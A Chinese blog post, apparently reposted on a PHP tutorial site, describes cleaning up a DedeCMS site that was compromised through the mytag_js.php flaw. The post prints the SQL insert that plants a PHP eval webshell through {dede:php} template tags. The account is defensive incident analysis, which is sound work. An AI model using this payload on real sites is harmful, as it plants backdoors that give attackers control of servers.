网站地图    收藏   

主页 > 后端 > 网站安全 >

DedeCMS缺陷导致数据库插入一句话木马 - 网站安全

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 话说我朋友的网站是dedecms的,上次遭到了mytag_js.php漏洞的入侵,之后我给他做了基本的安全设置(目录不可写,不可执行等)但他还是被黑了。于是就翻日志,发现了这么一条:xxx.xx...

 

话说我朋友的网站是dedecms的,上次遭到了mytag_js.php漏洞的入侵,之后我给他做了基本的安全设置(目录不可写,不可执行等)但他还是被黑了。

于是就翻日志,发现了这么一条:

xxx.xx.xx.xxx – - [26/Nov/2011:14:28:33 +0800] “POST /plus/mytag_js.php?id=8 HTTP/1.1″ 200 1141402

想,他请求这么多次?id=8干啥啊,结果想了想,既然漏洞利用条件是远程数据库并且在数据里插入了

insert into dede_mytag(aid,normbody) values(2,’{dede:php}$fp = @fopen(DEDEROOT.”safe121.com.php”, ”a”);@fwrite($fp, ”<?php eval($_POST["www.2cto.com"]) ?>”);echo “y”;@fclose($fp);{/dede:php}{/dede:php}’);

会不会他在本地数据库里也插入了这个呢,结果一看,还真是..

\

 

(此图已经经过处理)

然后又检查了myad_js表,均发现了这种后门,清理之,网站就没被入侵了。

 

摘自:www.0day.la

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论